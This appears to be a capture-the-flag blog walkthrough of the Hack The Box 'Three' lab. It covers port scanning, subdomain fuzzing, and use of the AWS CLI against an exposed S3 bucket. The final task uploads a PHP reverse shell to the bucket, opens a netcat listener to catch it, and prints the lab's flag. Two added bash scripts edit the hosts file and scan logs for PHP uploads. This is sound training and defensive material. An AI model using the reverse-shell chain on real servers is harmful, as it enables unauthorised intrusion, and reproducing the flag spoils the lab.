HTB Labs — Tier 1 — “Three” Machine Walkthrough | By CyberAlp0

Hey Folks, this is CyberAlp0. Back again with a new walkthrough powered by HTB, Tier 1, named “Three”. This machine covers some tasks that will walk you through finally finding the flag and solving the machine. This blog will guide you toward solving the tasks one by one and give you a little bit more information and hints regarding each question. These hints will widen your experience and sharpen your mind.
The reason the lab is named “THREE” is that it covers the S3 buckets of Amazon AWS. S3 is short for “Simple Storage Service”, and it is a public cloud storage resource available on the Amazon Web Services (AWS) platform.
Remember, Learning a thing about everything is much more important than learning everything about one thing.
Step 1: Connecting to the Starting Point Labs Servers.
To attack the target machine, you have to be on the same network. You can read my Blog which will guide you step-by-step into connecting to the target machine.
Step 2: Spawning the Machine and Start Solving the Tasks.
Task 1: How Many TCP Ports are Open in the Machine?
Answer: Number of TCP Ports = 2 Ports
Walkthrough:
We can use Nmap to find how many TCP ports are open on this machine by typing the following command.
nmap 10.129.253.225

Explainshell is a wonderful resource for explaining the Linux command line. You can use it as well to get more information about the different flags of Nmap.
Task 2: What is the domain of the email address provided in the “Contact” section of the website?
Answer: thetoppers.htb
Walkthrough:
By visiting the contact page on the website, you will be able to see the email address “mail@thetoppers.htb”. Thus the domain of the email is “thetoppers.htb”.

Task 3: In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses to be able to access the websites that point to those hostnames?
Answer: /etc/hosts
sudo nano /etc/hosts
Walkthrough:
The DNS server is responsible for domain name resolution. This means that instead of typing the IP address of each website you wish to visit, you just type the domain of the website, and DNS takes on the burden of translating the domain into an IP so that your request reaches the target server.
Two types of DNS servers can be configured in your system: a public DNS server and a local DNS server. An example of a public DNS server is Google DNS (8.8.8.8). Sometimes we can add a local DNS server, in case it helps us gain access to a specific website whose domain is not registered in the public DNS servers.
System configuration files are found under /etc. Two of them relate to the DNS configuration: the first is /etc/resolv.conf and the other is /etc/hosts.
If you want to know more about or change the DNS servers (public and local), open /etc/resolv.conf with nano. If you want to register a specific IP in the local DNS, open /etc/hosts with nano.
Remember, you need root privileges (sudo) to make changes to these files.
Once you finish adding the IP of the domain you want to access using nano, press Ctrl + X followed by Y to save your changes.

Task 4: Which sub-domain is discovered during further enumeration?
Answer: s3.thetoppers.htb
Walkthrough:
There is a difference between the domain and the subdomain. The domain is what you type, as in (https://www.google.com). The domain here is just Google. Subdomains are created to offer a service that is related and linked to the main domain, which is Google, like this (https://mail.google.com). In this case, mail is the subdomain under the domain Google.
You can add any number of other domains to /etc/hosts so that they map to the IP you choose (in this scenario, the IP of the machine).
You can find the sub-domains under the main domain (thetoppers) using tools like wfuzz, ffuf, and gobuster.
In our case, we will be using gobuster to enumerate the subdomains linked to the domain “thetoppers.htb”. ffuf and wfuzz can be used for the same subdomain enumeration.
The following are the commands that you will be using for each one of the tools. Also, note that we will be fuzzing the subdomains using a subdomain list provided by seclists.
1- Gobuster
gobuster vhost -u "http://thetoppers.htb" -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt --append-domain
2- wfuzz
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt -u "http://thetoppers.htb" -H "Host: FUZZ.thetoppers.htb" --hw 1036 -t 5
3- ffuf
ffuf -w /usr/share/seclists/Discovery/DNS/subdomain/subdomains-top1million-5000.txt -H "Host: FUZZ.thetoppers.htb" -u http://thetoppers.htb
Task 5: Which service is running on the discovered sub-domain?
Answer: amazon s3
Walkthrough:
Amazon Simple Storage Service (S3) is a storage service that offers data availability, security, and performance. Customers of all sizes can use Amazon S3 to store data and protect it from risks such as data leakage.
Read More: What is Amazon s3?
Task 6: Which command line utility can be used to interact with the service running on the discovered sub-domain?
Answer: awscli (short for: AWS Command Line Interface)
Walkthrough:
In the previous task, we learned that the service running on the subdomain is Amazon S3, which is mainly used for storing data and protecting it against cyber threats. To interact with the service running on this subdomain (s3.thetoppers.htb), you can use awscli, whose command name is aws.
awscli
Read More: How to configure Amazon Command Line Interface?.
Task 7: Which command is used to set up the AWS CLI installation?
Answer: aws configure
sudo apt install awscli

awscli has to be installed before typing the “aws configure” command. Install it using the command “apt install awscli” and just press “y” each time you are asked. Or, you can type the command “apt install awscli -y” to install without being prompted.
After installing the awscli, type aws configure
aws configure

After configuring the AWS CLI, we will be able to list all the buckets, as shown in the next task.
Walkthrough:
The “aws configure” command is the fastest way to set up the AWS CLI installation.
For more information: Configuring AWS CLI.
Task 8: What is the command used by the above utility to list all of the S3 buckets?
Answer: aws s3 ls
Walkthrough:
Amazon S3 (Simple Storage Service) buckets are used to store files, AKA “objects”. In the AWS cloud, these objects vary in size from a few bytes to terabytes. One of the main advantages of S3 buckets is their scalability, as you can store an unlimited amount of data in an S3 bucket.
Amazon S3 (Simple Storage Service) can be pictured as a balloon: it stretches depending on how much air you fill it with. Amazon S3 is scalable in the same way; it scales to meet your storage needs. You can start by storing a small amount of data, and the storage will grow as you store more data.
I recommend reading this blog for more information: AWS s3 Bucket.
To list all of the S3 buckets of the Amazon S3 service, type the following command along with the flag (--endpoint=URL). According to this resource, this option will help you list all of the S3 buckets.
aws s3 ls --endpoint=http://s3.thetoppers.htb s3://thetoppers.htb
You will get the following response

Note: you may face the following error while connecting to the Amazon S3 servers.

Could not connect to the endpoint URL: "http://s3.thetoppers.htb/thetoppers.htb?list-type=2&prefix=&delimiter=%2F&encoding-type=url"
Connectivity issue: Could not connect to the endpoint URL: {the URL you are trying to connect to}.
Solution: To successfully connect to the AWS S3 bucket servers through s3.thetoppers.htb, modify /etc/hosts so that s3.thetoppers.htb resolves to the IP address of the machine “THREE”.
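The /etc/hosts lookup described in Task 3 and the fix for the connection error above can be checked with a small script. This is an added example, not part of the original walkthrough; the function names are assumptions, and the demo runs on a constructed file rather than the real /etc/hosts.

```bash
#!/usr/bin/env bash
# Added example: function names are assumptions; the demo file is constructed.

# hosts_lookup FILE NAME: print the address FILE maps NAME to (first match wins).
# '#' starts a comment; field 1 is the address, later fields are names/aliases.
hosts_lookup() {
    awk -v name="$2" '
        { sub(/#.*/, "") }
        NF < 2 { next }
        { for (i = 2; i <= NF; i++)
              if (tolower($i) == tolower(name)) { print $1; found = 1; exit } }
        END { exit !found }
    ' "$1"
}

# hosts_ensure FILE IP NAME...: append "IP NAME" for each NAME missing from FILE.
# A NAME already pinned to another address is reported and left untouched.
hosts_ensure() {
    local file=$1 ip=$2 name current rc=0
    shift 2
    for name in "$@"; do
        if current=$(hosts_lookup "$file" "$name"); then
            if [ "$current" != "$ip" ]; then
                echo "conflict: $name -> $current (wanted $ip)" >&2
                rc=1
            fi
        else
            printf '%s\t%s\n' "$ip" "$name" >> "$file"
        fi
    done
    return "$rc"
}

# Demo on a constructed stand-in for /etc/hosts: only the main site is mapped,
# which is the state that produces "Could not connect to the endpoint URL".
demo=$(mktemp)
printf '127.0.0.1\tlocalhost\n10.129.253.225\tthetoppers.htb # main site\n' > "$demo"
hosts_lookup "$demo" s3.thetoppers.htb || echo "s3.thetoppers.htb: no entry"
hosts_ensure "$demo" 10.129.253.225 thetoppers.htb s3.thetoppers.htb
hosts_lookup "$demo" s3.thetoppers.htb
rm -f "$demo"
```

Against the real file, pass /etc/hosts as FILE and run the script with sudo.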

Task 9: This server is configured to run files written in what web scripting language?
Answer: PHP
Task 10: Submitting The Root Flag of the Machine
Answer: a980d99281a28d638ac68b9bf9453c2b
Walkthrough:
Since the server is configured to run files that are written in PHP, we will try to upload a PHP shell to the server by connecting to the AWS S3 buckets.
We will be using the webshells command in Kali Linux to copy this shell to the server.

The web shells are executable files located in a subdirectory of the path /usr/share. There are many PHP web shells; we will only be using “php-reverse-shell.php”. We will use nano to modify the IP address.
Follow the Following Steps:
Firstly: Get the IP provided to you when you are connected to HTB VPN, By typing ifconfig

Secondly: Modify the /etc/hosts.

We will be replacing the Local IP address “127.0.0.1” with the IP address provided to us when connecting to the VPN of the machine. We will also be changing the Port number to “8888”
Press Ctrl + X followed by Y to save your changes
Now, you have configured the PHP shell. All you have to do is to upload this shell to the server.
Thirdly: Upload the PHP shell to the server
aws s3 --endpoint=http://s3.thetoppers.htb cp php-reverse-shell.php s3://thetoppers.htb

Note: To make sure that the PHP shell was successfully uploaded, run the ls command.
aws s3 ls --endpoint=http://s3.thetoppers.htb s3://thetoppers.htb

Fourthly: Listening to the Connection coming from the PHP shell
We will run Netcat to listen to all the incoming connections coming from the PHP reverse shell on the local IP address we have configured and through port 8888.
nc -lnvp 8888


Fifthly: Capturing the flag of the machine
Now we have an open shell inside the server, which allows us to control the server and execute commands on it. By navigating the server, we will find the flag.txt file in the path /var/www.

The THREE Machine flag “a980d99281a28d638ac68b9bf9453c2b”
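From the defender's side, the upload in the third step shows up as a PUT of a .php object into the bucket that backs the PHP web root. The script below is an added example, not part of the original walkthrough: it scans an access log for such uploads, assuming a combined-format log on the S3 endpoint with path-style requests (/bucket/key, as in the error URL shown in Task 8). The client IPs, log lines and extension list are constructed.

```bash
#!/usr/bin/env bash
# Added example: log layout, client IPs and extension list are assumptions.

# script_uploads LOG BUCKET
# Prints "RESULT CLIENT KEY" for every PUT of a server-executable file into
# BUCKET. RESULT is ACCEPTED for a 2xx response and REJECTED otherwise.
script_uploads() {
    awk -v bucket="$2" '
        {
            if (split($0, q, "\"") < 3) next        # no quoted request line
            if (split(q[2], req, " ") < 2) next     # METHOD URI PROTOCOL
            if (req[1] != "PUT") next
            uri = req[2]
            sub(/\?.*/, "", uri)                    # drop the query string
            prefix = "/" bucket "/"
            if (index(uri, prefix) != 1) next       # other bucket or path
            key = substr(uri, length(prefix) + 1)
            if (tolower(key) !~ /\.(php[0-9]?|phtml|phar)$/) next
            split(q[3], rest, " ")                  # status, then bytes
            result = (rest[1] ~ /^2/) ? "ACCEPTED" : "REJECTED"
            print result, $1, key
        }
    ' "$1"
}

# Constructed sample log: a listing, the shell upload, an image upload,
# a rejected upload with a query string, and a later fetch of the shell.
log=$(mktemp)
cat > "$log" <<'EOF'
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /thetoppers.htb?list-type=2&prefix=&delimiter=%2F&encoding-type=url HTTP/1.1" 200 431
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "PUT /thetoppers.htb/php-reverse-shell.php HTTP/1.1" 200 0
192.0.2.22 - - [01/Jan/2024:10:03:40 +0000] "PUT /thetoppers.htb/images/band.jpg HTTP/1.1" 200 0
192.0.2.31 - - [01/Jan/2024:10:05:12 +0000] "PUT /thetoppers.htb/uploads/Info.PHP?x=1 HTTP/1.1" 403 0
192.0.2.10 - - [01/Jan/2024:10:06:00 +0000] "GET /thetoppers.htb/php-reverse-shell.php HTTP/1.1" 200 5493
EOF
script_uploads "$log" thetoppers.htb
rm -f "$log"
```

An ACCEPTED line means the bucket took a write of a file the web server will execute, so the fix is to deny unauthenticated writes to the bucket or to stop serving it as a PHP web root.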
Hope you enjoyed reading my blog about solving the Three machine from HTB — Tier 1 — Starting Point Phase.
See You in another write-up!